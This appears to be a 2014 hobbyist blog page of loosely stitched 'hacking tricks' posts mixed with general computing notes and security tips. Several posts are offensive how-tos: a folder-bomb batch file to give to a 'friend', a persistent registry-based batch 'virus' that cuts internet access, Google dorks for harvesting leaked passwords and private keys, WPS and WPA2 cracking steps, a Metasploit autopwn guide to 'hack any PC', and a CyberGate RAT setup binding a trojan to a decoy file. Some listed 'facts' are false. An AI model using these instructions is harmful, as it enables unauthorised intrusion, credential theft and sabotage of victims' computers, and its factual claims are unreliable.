Monday, 7 July 2014

DOWNLOAD AN ENTIRE WEBSITE

This is the hardcore option: downloading the entirety of a single website for offline reading. Obviously how long this takes will vary depending on the web site in questions – Wikipedia could take days to finish, and will take up a lot of your hard drive when it does. If you just want an offline copy of something simple, however, like the database a simple site outlining a few recipes you were thinking of trying, downloading an entire website might be right for you. The software I recommend for downloading an entire site is HTTrack, This open source program can be a little hard to use at first – especially if you’re not a Windows user. But if you’re looking to make a complete offline version of your favorite website – not an individual web page, an entire web site – it’s one of the simplest options out there. Tweak the settings if you run into problems and you should be fine. Only the Windows version comes with a dedicated GUI – Linux users will need to use a browser-based version of HTTrack instead. Don’t worry: items will be added to the menu so it’s easy enough to get started. Mac users can install the software using MacPorts, but many might be better off checking out Sitesucker, a free Mac app that functions similarly but is easy to install and has it’s own GUI.

Some Facts About Computers And IT

1.A byte means 8 bits and a nibble means 4 bits. 2.First harddisk available was of 5MB 3.Ethernet is the registered trademark of Xerox. 4.google uses over 10000 network computers to crawl the web 5.google can be queried in 26 languages 6.The floopy disk was patented by allen shugart in 1946. 7.More than 80% of web pages are in english. 8.88% percent web pages have very low traffic rate. 9.An average american is dependent on 250 computers. 10.Internet is most fastest growing platform for advertisement. 11.About one third of CDs are pirated 12.About 76% softwares used in india are pirated. 13.Only 10% of the webpages are used by the search engines 14."I feeling Lucky"This button is used by negligibal no of people on net"

HOW TO TRACE AN EMAIL

So here is the method of tracing the exact location from the email sent. I am showing the email tracing on yahoo here but gmail and other mail providing services have same concept. Step 1:-First open up your email account and click on your inbox. Step 2:-Now Select any email that you want to trace Step 3:-After Opening scroll the mail at the end and in right corner you will see a option FULL HEADER click on it Step 4:- Now Closely Look at the the header you will find the whole detail that from which IP address it is sent.

HACK REMOTE COMPUTERS USING THEIR IP ADRESS

1.Confirm a computer you want to hack 2. Find or regain their IP address. 3. Make sure the IP address is online 4. scan open ports 5. Check venerable ports 6. access via port 7. brute force username and password Find the IP address of victams computer... Is it online ? For the online status just ping the IP, if it is online address, he will answer . If the IP address is online, scan for open ports. Open ports are like closed door without locks, you can go inside and outside easily . Use Advanced Port Scanner to scan all open and venerable ports . Now that you have the IP address and port address Open the victim, you can now use telnet to try to access it. Make sure you have telnet enabled in your computer or install it from the Control Panel> Add or Remove Programs> Add Windows components . Now open a command prompt and use the telnet command to access the IP address. Use the following syntax for the connection . telnet [IP address] [port] You will be prompted to information input connection . If you can guess theinformation'seasily then it is OK. Or you can use some tools brute force like this.

HOW TO HIDE SECRET FILE IN IMAGE?

open command prompt. Now change directory to picture folder through command prompt. Now compress your secret file (secret.pdf) using winrar. Next we use command prompt. type following code copy /b [image_filename].jpg + [rar_ filename].rar nkd.jpg for our example code becomes copy /b apple.jpg + secret.rar nkd.jpg here nkd.jpg is our newfile which contain hidden document. Go your picture folder , you can see nkd.jpg. Now to view original file ,nothing too do just open file with winrar or you can also change extention from jpg to rar. here nkd.jpg is our newfile which contain hidden document. Go your picture folder , you can see nkd.jpg. Now to view original file ,nothing too do just open file with winrar or you can also change extention from jpg to rar.

NETWORK SNIFFER OR NETWORK MONITOR

A network sniffers monitors data flowing over computer network links. It can be a self- contained software program or a hardware device with the appropriate software or firmware programming. Also sometimes called "network probes" or "snoops," sniffers examine network traffic, making a copy of the data but without redirecting or altering it. Some sniffers work only with TCP/ IP packets, but the more sophisticated tools can work with many other protocols and at lower levels including Ethernet frames. Years ago, sniffers were tools used exclusively by professional network engineers. Nowadays, however, they are also popular with Internet hackers and people just curious about networking. Several sniffer software applications are available on the Web for download. #note.....guys I really work hard on these posts to keep u people updated...so keep liking and commenting,that will encourage me write more useful stuff..

Rootkits

Rootkit is a malicious software that is used to gain the administrator access to the operating system of the target computer. Traditionally, on the Unix systems, the main administrator account has a username called 'root'. This root user has all the privileges on the operating system. This is how rootkits got their name, since their basic task is to obtain root-level access to the system. The first known rootkit was written by Lane Davis and Riley Dake for SunOS 4.1.1 in 1990. Often rootkits hide their installation by replacing the standard operating system executables and libraries (dlls). Because of this, even if somebody scans the process table of the operating system he/she cannot detect the presence of a rootkit since all that he/she sees are the regular operating system processes.

FOLDER BOMBER

This batch file will create 3000+ folder in less than a minute. Open your notepad and type the following codes. @echo off :top md %random% goto top Save it as 3000.bat Give this file to your 'friend' and when he will click on that his nightmare will be started.

TRICK TO MAKE VIRUS WHICH CAN DISABLE INTERNET TEMPORARLY

To do this follow the steps.. 1) Open Notepad. 2) Copy and Paste the following Code into Notepad : echo @ echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_ all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_ machinesoftwaremicrosoftwindowsc urrentv ersionrun /v WINDOWsAPI /t reg_sz /d :windowswimn32.bat /f reg add hkey_current_ usersoftwaremicrosoftwindowscurr entve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE 3) Save it as Internet Disabled.bat. 4) Now it is done. So it is a simple Trick to make Virus which can Disable Internet temporarily.

Hacking FB Account Using Google Dork Lis

Method 1: usernames and passwords of many accounts including Facebook! The Dork: intext:charset_test= email= default_ persistent= Enter that into Google, and you will be presented with several sites that have username and passwords lists! Method 2: WordPress! This will look for WordPress backup files Which do contain the passwords, and all data for the site! The Dork: filetype:sql inurl:wpcontent/ backup-* Method 3: WWWBoard! This will look for the user and passwords of WWWBoard usersThe Dork: inurl:/wwwboard/passwd.txt Method 4: FrontPage! This will find all users and passwords, similar to above. The Dork: ext:pwd inurl service | authors | administrators | users) "# - FrontPage-" Method 5: Symfony!This finds database information and loginsThe Dork: inurl:config/databases.yml - trac -trunk -"Google Code" -source -repository Method 6: TeamSpeak! (big one!!!!!) This will search for the server.dbs file (a Sqlite database file With the SuperAdmin username and password!!!) The Dork: server-dbs "intitle:index of" Method 7: TeamSpeak2!!! (also big!) This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for "superadmin account info:" The Dork: "inurl:Teamspeak2_RC2/ server.log" Method 8: Get Admin pass!Simple dork which looks for all types of admin info The Dork: "admin account info" filetype:log Method 9: Private keys! (not any more!) This will find any .pem files which contain private keys. The Dork: filetype:pem pem intext:private And the Ultimate one, the regular directory full of passwords.... Method 10: The Dir of Passwords! Simple one! The Dork: intitle:"Index of..etc" passwd

What is XSS?

Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.
In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.
Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.

HOW TO SAFE YOUR FACEBOOK ACCOUNT FROM HACKERS,PHISHING ATTACK OR KEYLOGGING/VIRUS

1- All users must be have their strong password [maximum 12 words & 5 numbers]
2- Go to setting option click 'security' click on secure browsing you must be 'enable browsing'.
3- Click on login notification you see two option 'text' 'email or push notification' & click on both option.
4- You must be enable 'code generator' in security option.
5- If you use 'trusted contacts' don't add online people to trusted contacts if you use so please please add those online people who have very close you, you meet with them, you everything know about him/her.
6- Go to 'privacy' setting you see 'Who can see my stuff?' set the 'friends'.
7- Next you see Who can contact me? Who can send you friend requests? set the everyone or friends of friends your choice. Whose messages do I want filtered into my Inbox? Filter your Inbox using: Set your own choice>>>
Basic Filtering Recommended Mostly friends and people you may know
Strict Filtering Mostly see messages from friends. Messages from people you want to hear from may go to your Other folder.
8- Who can look me up? Who can look you up using the email address or phone number you provided? Set the 'friends' if you wanna more secure set the 'only me'.
9- Go to Timeline & tagging setting Who can add things to my timeline? Set the 'only me' Review posts friends tag you in before they appear on your timeline? Set the 'off'. Who can see things on my timeline? Who can see things on my timeline Set the 'friend' Who can see what others post on your timeline? Set the 'only me'. How can I manage tags people add and tagging suggestions? Set the 'on'/'friends'/'friends'. they are 3 option in How can I manage tags people add and tagging suggestions?.
10- Notification setting 'How You Get Notifications' On facebook set the 'all notification&sound' Email notification set the 'all notification'
11- What You Get Notified About Activity that involves youView set the 'On' Close Friends activity set the 'Facebook & email' Tags set the 'Friends' Followers On for Friends of Friends
12- Next the mobile option you must be register mobile number for recover or reset password.
13- Add alternative id to reset password [12 & 13 option are required]
14- Turn On Follow turn on follow Followers will only see your public posts and will not be added as friends. You can choose the posts you want to make public and those you only want to share with friends. Follower Comments Who can comment on your public posts? Set the 'Friends' Follower Notifications Get notifications from set the 'Friends of Friends'
15- If you add personal detail in timeline setting go to timeline click about & set the all setting to friends or only me. About You, Work and Education, Relationships and Family, living, basic information set the 'friends'. Mobile Phones Address, Screen, Email. Facebook they are contact info set the all 'only me'.
16- Others info you see in about (in timeline) set all privacy to 'friends'
17- You must be add twitter id to fb account which your tweets or which you following the people tweets to your news feeds.
18- If you add anu like as youtube se the privacy all app to friends only friends see your app then when you add video to your playlists, like video, favorites video in youtube they also update post in your newsfeed.
19- Do not accept friend request for those people who have not upload real profile photo, their lived in option are not see, in their timeline, do not accept friend request quickly i suggest you accept request after 2 days. When you will send friend request or accept request you must see their timeline their latest update if not do not accept & send friend request.
20- Do not join anonymous groups and do not like, like the page those is not activate&update. How can you check if page is active&update so like the page then if you will see in like button 'Show in news feed & setting' option then you will like the page if only 'Show in news feeds do not like page & do not like the post.
21- If someone contact you who is outside country (INDIA) quickly block them.
22- Do not upload any files like as software from your pc only upload photos&videos from pc fb don't upload the program file and do not post anonymous link in your fb if you, please scan the URL link go to WWW.VIRUSTOTAL.COM & scan url if show virus do not post link.
NOTIFICATION & CODE GENERATOR MEANS THAT IF SOMEONE HACK OR ATTACK PHISHING ON YOUR FB, FACEBOOK NOTIFY IN YOUR EMAIL & ON FACEBOOK THEY WILL AUTOMATIC LOGOUT OR REDIRECT TO RESET PASSWORD PAGE.

Cracking WPA/WPA2 By brute forcing Wi-fi Protected Setup

For legal purposes, please don’t try this on any equipment that you don’t own. Intro Wi-fi Protected Setup more commonly known as WPS is an optional configuration tool introduced in many Small office and Home Office (SOHO) Wireless routers starting in early 2007. This Wi-Fi alliance certification program was designed to ease the task of SOHO wireless configuration by providing an industry wide network setup solution. Now a day most major vendors of the SOHO class of Wi-Fi routers ship there product with WPS support and is activated by default. Today we will be taking a look at 2 flaws in the WPS design that can be exploited in order to brute force the WPS PIN. I will do a brief overview of these 2 flaws then follow up by providing instruction on how to work through exploiting WPS on a SOHO router using Backtrack 5 R3 and a tool called Reaver. The Flaws The flaws we will be looking at have to do with WPS’s support for in-band configuration over IEEE 802.11/EAP specifically with the External registrar process. This is the process used by a WLAN host to associate with a WAP by using the devices WPS PIN. That being said the first flaw with this external registrar option is that it does not require any authentication from the WLAN host to associate with the WAP leaving the PIN vulnerable to Brute force type attacks. The second Flaw has to do with the way the WPS authentication process is implemented with 802.11/EAP. This process uses a challenge response methodology and if at any point in the process you fail to correctly respond to the challenge you receive a EAP-NACK Message. This process also splits the key into 2 parts as shown below |1|2|3|4|5|6|7|0| 1st half| 2nd half & of PIN | Checksum So by knowing what at what step we are in the process when we receive the EAP-NACK we reduce the number of possibilities from 10^8 down to 10^4 +10^4 or 100,000,000 to 20,000 but since we know the 8th digit is a checksum of the pin we are really looking at 10^4 + 10^3 or 11,000 total testable combinations to solve for the completed WPS PIN. So with a tool like reaver testing 4 Pin’s every 3 seconds we can get through all possible combinations in approximately 4 hours. Using Reaver with Backtrack 5 R3 What you will need: A copy of Backtrack 5, and an external WLAN adapter ( I use the Alfa networks AWUS036H ) You will also need to know the BSSID (MAC Address ) of the Router you plan to attack. for this you can use something like airodump-ng to analyze all the AP’s in the area. So lets get to the fun stuff. 1. Load up your Backtrack 5 instance 2. Open up terminal and run the following commands a. CODE : Sudo apt-get update b. CODE : Sudo apt-get install reaver 3. Make sure your Wi-fi adapter is connected and then place it into monitor mode a. CODE : Airmon-ng start wlan0 4. Next run the following command to invoke reaver a. CODE : Reaver –I mon0 –b <BSSID of target> -VV Note: you can use CTRL+C to pause and save the attack progress to continue at a later time

DEAD LOCK IN OPERATING SYSTEM

It is a state where two ore more operations are waiting for each other, say a computing action 'A' is waiting for action 'B' to complete, while action 'B' can only execute when 'A' is completed. Such a situation would be called a deadlock. In operating systems, a deadlock situation is arrived when computer resources required for complete of a computing task are held by another task that is waiting to execute. The system thus goes into an indefinite loop resulting into a deadlock. The deadlock in operating system seems to be a common issue in multiprocessor systems, parallel and distributed computing setups.

Hack Codes for Android Mobile

1. Complete Information About your Phone *#*#4636#*#*
2. Factory data reset *#*#7780#*#*
3. Format Android Phone *2767*3855# (think twice before using this code)
4. Phone Camera Update *#*#34971539#*#* (Don't Update camera firmware in image)
5. End Call/Power *#*#7594#*#*
6. File Copy for Creating Backup *#*#273283*255*663282*#*#*
7. Service Mode *#*#197328640#*#*
8. WLAN, GPS and Bluetooth Test Codes:
*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#* - WLAN test (Use "Menu" button to start various tests)
*#*#232338#*#* - Shows WiFi MAC address
*#*#1472365#*#* - GPS test
*#*#1575#*#* - Another GPS test
*#*#232331#*#* - Bluetooth test
*#*#232337#*# - Shows Bluetooth device address
9. Codes to get Firmware version information:
*#*#4986*2650468#*#* - PDA, Phone, H/W, RFCallDate
*#*#1234#*#* - PDA and Phone
*#*#1111#*#* - FTA SW Version
*#*#2222#*#* - FTA HW Version
*#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number
10. Codes to launch various Factory Tests:
*#*#0283#*#* - Packet Loopback
*#*#0*#*#* - LCD test
*#*#0673#*#* OR *#*#0289#*#* - Melody test
*#*#0842#*#* - Device test (Vibration test and BackLight test)
*#*#2663#*#* - Touch screen version
*#*#2664#*#* - Touch screen test
*#*#0588#*#* - Proximity sensor test
*#*#3264#*#* - RAM version"

Social Engineering

This has become one of the hottest topics today and it seems to work out most of the times. Social Engineering doesn't deal with the network security issues, vulnerabilities, exploits, etc. It just deals with simple psychological tricks that help to get the information we want. This really works!! But it requires a lot of patience. We are all talking about network security and fixing the vulnerabilities in networks. But what happens if some internal person of a network accidentally gives out the passwords. After all we are all humans; we are also vulnerable and can be easily exploited and compromised than the computers. Social Engineering attacks have become most common during the chat sessions. With the increase in use of Instant Messengers, any anonymous person may have a chat with another any where in the world. The most crucial part of this attack is to win the trust of the victim.
It may take a long time (may be in minutes, hours, days or months) for this to happen. But after you are being trusted by the victim he will say you every thing about him. Most of the times his person information will be useful to crack his web accounts like e-mail ids, etc. Even some people are so vulnerable to this attack that they even give their credit card numbers to the strangers (social engineers). Some social engineers stepped one more forward and they send some keyloggers or Trojans to the victims claimed to be as screensavers or pics. These keyloggers when executed gets installed and send back information to the attacker. So be careful with such attacks.
Prevention: 1) Don’t believe everyone you meet on the net and tell them every thing about you. Don’t even accidentally say answers to the questions like “What’s you pet’s name?”, “What is your mothermaiden’s name?”, etc. which are particularly used by your web account providers to remind your passwords.
2) Don’t give your credit card details to even your chating through instant messengers. Remember, it’s not a hard deal for an attacker to crack an e-mail id and chat with you like your friend. Also data through IMs can be easily sniffed.
3) Don’t accept executable files (like *.exe, *.bat, *.vbs, *.scr, etc.) from unknown persons you meet on the net. They might be viruses or Trojans. Please act carefully, use security software and ask professionals for help.
Social Engineering Toolkits Like Set , MALTEGO

Why Hackers and Programmers choose Linux instead of Windows and Mac?

-Linux is advanced High Level OS. -Comfortable for Hackers and others. -24/7 always virus free. -Greatest OS for Programmers to develop Soft. -Always free. -All OS born from Linux only. -Linux contain all types of Programming Lan and Hacking tools. -Linux is the No. 1 for Server and Client Scripting. -Windows is Base and Linux is Race. -Linux have high developed Programmed. -Linux is the open source OS. -Google Web Server (GWS) — Custom Linux-based Web server that Google uses for its online services. -Novell in 2006 migrate from Windows to Linux. -IBM Supports Linux 100%. -Amazon.com is said to "use Linux in nearly every corner of its business. -Cisco Systems, the computer networking and routing giant, switched to Linux.

Some Useful Websites For Hacking.

To check if a port is open: http://www.canyouseeme.org/
To multiple scan a file for viruses: http://vscan.novirusthanks.org/
To check if a site is down: http://www.downforeveryoneorjustme.com/
A place to get newest exploits: http://www.exploit-db.com/
Lets other people view your inserted text: http://pastebin.com/
The free online crypting + decrypting service: http://www.crypo.com/
An online MD5 decrypter: http://www.md5decrypter.com/
The best online Admin Page Finder: http://sc0rpion.ir/af/
Online WPA cracker: http://wpa.darkircop.org/
Online Fake Mailer: http://emkei.cz/
A mailing site ( it gives you a temporary email account to send and receive messages ): http://10minutemail.com/10MinuteMail/index.html
It gives you alternatives for program's: http://alternativeto.net/
Upload and send files to friends etc. Very quick: http://ge.tt/
The best online Admin Page Finder: http://sc0rpion.ir/af/
Online WPA cracker: http://wpa.darkircop.org/

"The Hand of thief" the first successful Linux trojan

Desktop Linux must be growing more popular. Someone's finally created what appears to be a semi-successful Linux Trojan.
For years, Linux desktop users had it easy. Their Windows brothers and sisters had to deal with an unending stream of malware; but other than a handful of exploits aimed mostly at Linux servers, there were no real Linux Trojans or viruses. Oh well, all good things must come to an end.
RSA, the Security Division of EMC, has reported that a "Russia-based cybercrime team has set its sights on offering a new banking Trojan targeting the Linux operating system: Hand of Thief."
Here the name of the game is to grab your personal login and password data with a "Form grabber" as you enter it into your bank or other online system. This information consists of your stolen credentials, the timestamp of when you visited a site, which Web sites you visited, and possibly your Web browser's cookies. Finally, all this is then passed on over the Internet to a command-and control server. From there the crooks can get to work selling your information to people who will start running up your credit-card bills.
Hand of Thief also includes a mechanism to prevent users from accessing anti-virus sites. This seems to work by manipulating Internet Domain Name System (DNS) addresses within memory rather than doing some obvious such as changing records in your hosts file.
Its developer claims "it has been tested on 15 different Linux desktop distributions, including Ubuntu, Fedora, and Debian. As for desktop environments, the malware supports 8 different environments, including Gnome and KDE." The attack specifically targets common Web browsers Firefox, Google Chrome, as well as several other that others that are often found on Linux such as Chromium, Aurora, and Ice Weasel.
Spread your RAT Swiftly Video Tutorial: http://www.youtube.com/watch?v=QcHVsUJsAuk

What is RAT?

RAT stands for Remote Access Tool. It allows to access a system remotely without having physical access to the system. It is basically a service that is available in Windows OS known as remote services. It is used to connect to the network system remotely. Simple Remote Desktop Connection and RADIUS servers are the two common methods of doing this. So we will exploit this service to get unauthorized access. There are many famous tools that allows us to do the following like blackshades, crybergate, cerberus, turkojan etc. So here we will be discussing about cybergate.
So how will cybergate work? In cybergate you can create servers (infected exes). If you victim opens this file you will be able to RAT him.
Will the server(infected file) that I create will be picked up by Anti-Virues? Yes, it will be. You will need to crypt is using a crypter or use other methods like Hexing.
Oki so lets get to the practical part:
I. Create No-IP Account:
1) Goto No-IP.com and register and account. 2) Login to your account. 3) Click on this 4) Keep the same setting as in the picture. And click on create host. 5) Now goto this page and download the no-ip client. 6) Open the downloaded client and install it. 7) Open the installed No-IP Duc client. Now give in your login details and you will see the created host. 9) Remove the checkbox and again check it. 10) Minimize your no-ip duc
Remember you always need to open your no-ip client and click the check box to get smiley whenever you are going to control your RATs.
II. Port Forwarding:
What is Port Forwarding? Port forwarding or port mapping is the forwarding of a TCP/IP packet in a network address translator gateway to a predetermined network (which will be our No-IP Account).
1) Find out your gateway. 2) Goto Start----> Run 3) Type in "cmd" 4) Now type "ipconfig" and click enter 5) And you will get the gateway IP. 6) Now type the gateway IP in your web browser. 7) It will ask for username and password. You can find your username and password from a sticker behind your router. Most of the time the user and pass will be "admin". 9) After successful login to your router you will be able to see options for portfowarding. 10) Forward port "100" to your local IP.
To check whether port "100" is open. Goto this link: http://www.canyouseeme.org/ ...and type in port 100 and check the result.
III. Creating a server: 1) Close your anti-virus. Since this type of virus/trojan builders are detected by anti-viruses as a false positive. 2) Download: http://darkcomet-rat.com/ 3) Unrar/Decompress it and open "CyberGate v1.07.5.exe" 4) Wait for 20 seconds untill the disclaimer notice is scrolled over. 5) Click on Control Center and click "Start". 6) A box will pop up. Give the settings: type in the same details (from the top): 100 1,000 123456 then save it. 7) If any Windows Firewall box pops up click "Allow access". Goto Control Center -----> Builder ----> Create Server. 9) A new box pops up. Click "Add User". Type in a username. 10) Double click the created username. 11) Select DNS port and delete it. 12) Give username: Cyber and password: 123456 click add type-in the NO-iP you created and add ":100" at the end. click OK - this will add it to the DNS list. 13) Follow the picture 14) Select: Bind File, Bind "..." to setup some file. Click add after browsing the file you want the virus to be binded.
So you created a server binded to some file!

Top 15 Security/Hacking Tools & Utilities

1. Nmap
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing.
2. Nessus Remote Security Scanner
Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.
3. John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
4. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).
5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.
If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

#3 How to block Content on the Internet

HTTP(Hyper Text Transfer Protocol):-It is the communication protocol that is normally used by your browser to communicate with websites.
Port:-A port is a door through which data enters or leaves your computer.Ports are used to exchange data between different devices.There are two types of ports: -Hardware ports:-All of us use hardware ports like USB ports,parallel ports,Ethernet port.These are normally used to exchange data between two devices. -Virtual ports:-All web applications on your computer open something known as virtual ports on your computer to communicate with servers on the internet.Without virtual ports there would be no way for applications on your computer to communicate with remote servers on the internet.You can find a list of open virtual ports on your computer by simply going to the MSDOS prompt and typing the command netstat-n.
Proxy server:-A proxy server is a server or software that acts as an intermediary between a user and the internet.Whenever a user sends a request for a webpage to a proxy server,the proxy server will forward that request to the relevant server on the internet and then send back the response to the user. step 1---USER-->sends request for a webpage-->PROXY step 2---PROXY-->sends same request to relevant website-->WEBSITE step 3---WEBSITE-->sends back requested page-->PROXY step 4---PROXY-->sends back request page-->USER.

#2 How to block Content on the Internet:-

Domain name:-It is a quite difficult to remember IP addresses since they are just a bunch of numbers.To make simpler for users,every website not only has an IP address,but also has a corresponding domain name.A domain name is an easy-to-remember name for a website.For example, www.facebook.com is an example of a domain name.
Domain name system(DNS) lookups:-The process of converting a domain name into respective IP address is known as DNS lookup.Your browser performs a DNS lookup automatically in the background each time you type a website address in your browser.
DNS server:-A DNS server is a server that handles DNS lookup queries from browsers/users and sends back replies to them.Your college,company or organization will have its own DNS server that will manage the local user's DNS lookup requests.

How to block Content on the Internet

There is a variety of techniques,methods and tools that organizations,companies and colleges use to block content on the internet. We'll discuss them but there are some basic technical Internet-related terms that we must know.
IP address:-Every computer connected to the internet has a unique IP address given to it.An IP address is basically a computer's identity on the internet at which it can be contacted.Your computer has an IP address.Your friend's computer has an IP address and even all your favourite websites on the internet have their own IP addresses.A typical IP address looks like the following:203.14.11.12.You can find out your own computer's current IP address by simply your browesr and connecting to the website http://www.whatismyipaddress.com

Hack any PC using IP via Metasploit

1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.
2.) You need PostgrSQL for your database. Download here:http://www.postgresql.org/ Make sure you use all the defaults or Metasploit woun't work!
3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...
4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui.
5.)Now, in the window type:
db_connect postgres:ThePassYouChose@localhost:5432
The first time you do this you will see lots of text flash buy. Don't wory, this is normal.
6.)Type db_host to make sure you are connected correctally.
7.)Now type this:
db_nmap 000.000.000.000
Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...
8.) Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back...
9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.
10.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:
sessions -i ExploitNumber
The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, controll their mouse, see what they type, see them, etc.

Wi-Fi Security Tips & Tricks

Learn how you can secure your Wi-Fi Network. Prevent intruders from easily compromising your Wi-Fi network. There can be many ways to prevent attacks. One way is to make sure you have encryption enabled and use a strong WPA2 with a sophisticated password with both small letters, capital letters and characters. Make sure you disable WPS Wifi Protected Setup features since the feature has been prone to multiple vulnerabilities. Another good way is to lower your signal strength so it is only covering your premises. This can prevent an intruder sitting outside in a car lot to get a good signal.
Wi-Fi Security Guidelines.
Wi-fi networks are getting more and more widespread. Nowadays, it is possible to find wi-fi networks anywhere. It is therefore of utmost importance for users to focus their attention on the growing threat of hackers and crackers; these online outlaws must be taken very seriously.
Setting up encryption.
Often, when you get a new router or device with wi-fi, it has no password setup at all! It is recommended to always setup an encryption scheme in order to avoid getting hacked by any cyber terrorists..
Ten recommendations concerning safe use of wireless networks.
1. Always use encryption.
2. Set your SSID name to a sophisticated long name with numbers and letters or a non-dictionary term.
3. Do not broadcast your SSID (network name). Keep it hidden. 4. Use MAC filtering to access control connecting IPs.
5. Never use WEP encryption. Even WPA (TKIP) has been found to be vulnerable to attacks.
6. Always use WPA2 (AES) encryption or better encryption. 7. Set the auto change of the key to 1800 seconds (30 minutes). 8. Make sure the password is a non-dictionary term using a combination of at least ten letters and numbers. 9. Implement firewall protection from the wireless access point and to the network. 10. Make sure the web interface on the wireless access point is firewalled and not accessible to intruders.
The Portable Penetrator: Wi-Fi Security Auditing. With the Portable Penetrator, you can audit or crack WEP, WPA, and WPA2 wi-fi standards! It is recommended for you to use the Portable Penetrator to audit your wi-fi networks as often as possible in order to make sure that no hackers or crackers can compromise or invade your system.

HOW TO SET ADMINISTRATOR PASSWORD IN WINDOWS WITHOUT KNOWING EXISTING PASSWORD.

1. GO TO CONTROL PANEL
2. CLICK ON " ANDMINISTRATIVE TOOLS"
3. NOW CLICK ON " COMPUTER MANAGEMENT "
4. NOW GO TO SYSTEM TOOLS
5. DOUBLE CLICK ON LACAL USERS AND GROUPS
6. THEN FINALLY UNDER USERS U WILL SEE ALL THE USER ACCOUNTS INCLUDING ADMIN ACCOUNT.
7. NOW RIGHT CLICK ON ADMINISTRATOR AND CLICK SET PASSWORD
8. IT WILL NOT ASK FOR PREVIOUS PASSWORD SO U DON'T NEED TO KNOW IT.
9. NOW ALL DONE..! !!

BEST WEBSITES FOR LAPTOP DRIVERS:

#Working way to hack a wifi .

Strictly warning - FOR STUDY PURPOSE ONLY . If anyone do missuse of the given information then I will not be responsible for it. #Spidr
how to a crack a Wp2-psk password with windows machine.- Software used 4 it :- 1. CommView for Wifi 2. Elcomsoft Wireless Security Auditor
First you need to be capture the Wpa2, four-way handsake with CommView.
Open commView and click on the Start option then click on the capture option to start the capture
now it will show you all available AP, N ow click on the Tools > Select the Node Reassoication option
now select your target AP in the Send a deauthentication request from this AP option. it will show you all available client option.
now click on the Send Now option to send the packet for 4-way authentication. wait for some time so it will capture the packet.
now click on the Save option and choose your file format Commview Capture Files (*.ncf) you capture work is done.
Now open Elcomsoft Wireless Security Auditor
Click on the Import Data tab > select the Import CommViewLog option .
now it will show you information about AP and Multiple Handshake selection information. Click on Ok.
now click on the Start attack option and select the Dictionary Attack option.
However you have other attack options are also available.
now within minutes it will found your password and it will show you the password.

Convert text files to audio

A post on how to convert text to audio had been posted on this page. So here is a trick to make the computer read out the entire contents of a text file.
1. Open notepad and paste the code given below:
Set sapi = CreateObject("s­api.spvoice") Set fs = CreateObject("S­cripting.FileSy­stemObject") path = Inputbox("Enter­ path for the text file to read:", "#Expert Hackers") If Not (fs.FileExists(­path)) Then X = Msgbox("The specified file does not exist!", 48, "ERROR!") Else Set a = fs.OpenTextFile­(path) text = a.ReadAll sapi.Speak(text­) a.Close End If
2. After pasting save as a .vbs file.
3. Open the vbs file and enter the path to the text file and press Enter.
4. If the specified file does not exist an error message will be displayed. If the file exists then the computer will start reading it out!
6. After the computer starts to read the text file if you want to exit the program open task manager by pressing Crtl+Shift+Esc and end the process "wscript.exe" under the Processes tab.

10 Hacking Software and Tools

Contains a following software: - Cain and Abel (sniffer) - John the Ripper (powerful brootforce) - NetStumbler (allows to define radius of action of network WiFi –in real time for the diagram it is possible to see size of a useful signal) - Nmap (one of the best network scanner) - Putty (a quite good telnet the client) - SuperScan (powerful scanner TCP of ports, pinger and hostname resolver) - Hping (allows to generate specialICMP/UDP/TCP packages and to look through answers ping a hostin style of the usual utility ping) - Lcp (audit and restoration of passwords Windows NT / 2000 / XP / 2003) - Nikto (perl the scanner broken Web a server, with support SSL) - Kismet (sniffer a wireless network 802.11 and the decoder of packages)

How To Save Your Smart Phone From Battery Killing Applications...

